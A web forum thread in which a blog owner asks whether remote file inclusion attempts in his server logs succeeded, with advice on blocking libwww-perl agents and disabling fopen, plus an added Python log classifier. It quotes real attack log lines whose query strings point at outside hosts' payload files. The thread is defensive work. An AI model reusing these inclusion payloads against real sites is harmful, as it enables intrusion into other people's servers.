Remote File Inclusion (RFI) Attempts (6 posts)

  1. asechrest
    Member
    Posted 7 months ago #

    Hi, all. I've had a bunch of remote file inclusion attempts today - they've been hammering away at my domain. I've done my best to research the subject but I'm starting from scratch - I knew nothing about it until this evening.

    I'm poring through my server logs and trying to see if the attacks have been successful. Mostly I see 404's, which I've been told probably means that specific attempt was not successful. But in some cases I see like the following, with a 200 success indication:

    97.106.184.215 - - [29/Apr/2009:20:24:56 -0500] "GET /wp-content/plugins/gd-star-rating/css/gdstarating.css.php?s=astarscape%7C20%7C3%7Cpng%7C1%23moxygen%7C20%7C20%7Cpng%7C1 HTTP/1.1" 200 7955 "http://blogingenuity.com/2009/04/08/how-to-validating-your...site-the-easy-way-part-2/%20%20/errors.php?error=http://www.sanbokyodan.fr/editor/xml/copyright.txt??" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 GTB5"

    I don't know if this means the attempt was successful and I need to start worrying or what.

    Could anyone who's experienced this shed some light on:
    1) How can I tell if an attempt was successful, and what's the next step?
    2) How can I best prevent the attacks in the first place?

    Thanks in advance.

  2. whooami
    Member
    Posted 7 months ago #

    what do you see when you put that into a browser?

  3. asechrest
    Member
    Posted 7 months ago #

    I get a page not found notice, which I think is good news. But I have hundreds of these today, from what look like a number of different sources. Some of them appear to be trying to load a text file. I have a bunch similar to this:

    209.62.42.242 - - [29/Apr/2009:15:36:49 -0500] "GET /2009/04/08//vwar/backup/errors.php?error=http://caketaker.biz//scrollerroller/id.txt??? HTTP/1.1" 404 40489 "-" "Mozilla/5.0"

    I've searched my server filesystem for the text file name and it hasn't been found. This is also, I think, good news.

    Generally, though, I'm wondering if I can simply determine if they successfully added a page or successfully loaded a file to my server, and if the answer is no to both, can I feel relatively comfortable (not assured, obviously) that the attempts failed?

    I'm researching how to prevent the attempts altogether. I've checked my file/folder permissions and they seem to be what's recommended. I've read some suggestions not to use "fopen" but understanding that is a bit above me at the moment.

    Thanks for the response.

  4. whooami
    Member
    Posted 7 months ago #

    they failed.

    what they're trying to load is right here,

    http://www.//sanbokyodan.//fr/editor/xml/copyright.txt

    link broke.

    one of the easiest ways to thwart a lot (not all, just a lot) of RFI attempts is to disallow any libwww-perl user-agents.

    # Return 403 Forbidden for any request whose User-Agent contains "libwww-perl" (case-insensitive)
    RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC]
    RewriteRule ^.*$ - [F]

    That's one way.

    Some will argue with me, but mod_security is also excellent at stopping them.

    Of course the best way is yes, to not use fopen. You can disable it in the php.ini.
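
An added example, not code from the thread, that does by script what asechrest is doing by hand in posts 1 and 3 and applies whooami's points from post 4: it parses Apache combined-format log lines, picks out query-string values that are absolute URLs (the RFI shape), reports whether the payload sits in the request or only in the Referer header and what the status code means for that spot, and flags libwww-perl user agents. The first two sample lines are the ones quoted above; the third is constructed, and the php.ini directive names allow_url_include / allow_url_fopen are my pointer to what "disable fopen" refers to.

```python
import re
from urllib.parse import urlparse, parse_qsl

# Apache "combined" log: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')

def remote_urls(query):
    """Query-string values that are absolute http(s) URLs: the shape of an RFI payload."""
    return [v for _, v in parse_qsl(query, keep_blank_values=True) if re.match(r'https?://', v, re.I)]

def classify(line):
    """Say where (if anywhere) the payload sits and what the status code means for that spot."""
    if not (m := LOG_RE.match(line)):
        return None
    f = m.groupdict()
    target = urlparse(f["target"])
    r = {"ip": f["ip"], "status": int(f["status"]), "path": target.path, "where": None,
         "payload": None, "libwww_perl": "libwww-perl" in f["agent"].lower()}
    if hits := remote_urls(target.query):  # payload aimed at a script on this server
        r["where"], r["payload"] = "request", hits[0]
        if r["status"] == 404:
            r["verdict"] = "failed: target script not on disk"  # nothing ran, nothing was included
        else:  # script exists: does it feed that parameter to include/require? is allow_url_include off?
            r["verdict"] = "target exists (HTTP %d): inspect script and php.ini" % r["status"]
        return r
    if hits := remote_urls(urlparse(f["referer"]).query):  # payload only in the Referer header
        r["where"], r["payload"] = "referer", hits[0]
        r["verdict"] = "payload only in Referer; status is for " + target.path
        return r
    r["verdict"] = "not RFI-shaped"
    return r

def report(lines):
    """Keep only the RFI-shaped lines so a day of traffic reduces to the entries worth reading."""
    return [r for r in map(classify, lines) if r and r["where"]]

# First two lines are the ones quoted in the thread; the third is constructed to show the 200 case.
SAMPLE_LOG = [
    '97.106.184.215 - - [29/Apr/2009:20:24:56 -0500] "GET /wp-content/plugins/gd-star-rating/css/gdstarating.css.php'
    '?s=astarscape%7C20%7C3%7Cpng%7C1%23moxygen%7C20%7C20%7Cpng%7C1 HTTP/1.1" 200 7955 "http://blogingenuity.com/2009/04/08/'
    'how-to-validating-your...site-the-easy-way-part-2/%20%20/errors.php?error=http://www.sanbokyodan.fr/editor/xml/copyright.txt??" '
    '"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 GTB5"',
    '209.62.42.242 - - [29/Apr/2009:15:36:49 -0500] "GET /2009/04/08//vwar/backup/errors.php?error='
    'http://caketaker.biz//scrollerroller/id.txt??? HTTP/1.1" 404 40489 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [29/Apr/2009:21:00:00 -0500] "GET /errors.php?error=http://example.invalid/x.txt?? '
    'HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
]
```

For the first post's line it reports that the remote URL sits only in the Referer, so the 200 is the plugin's CSS file being served, not a remote include; the constructed third line is the one shape that actually needs the script and php.ini looked at.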

  5. asechrest
    Member
    Posted 7 months ago #

    Ok, I'll take a look at implementing those and do some more research to see if not using fopen has any negatives.

    Thanks whooami.

  6. asechrest
    Member
    Posted 6 months ago #

    For anyone new to RFI who comes across this thread in the future...

    After Whooami's help and additional research, I wrote up a little beginners guide to tracking and mitigating Remote File Inclusion.

    Constructive criticism or corrections from those more knowledgeable than me is welcomed.
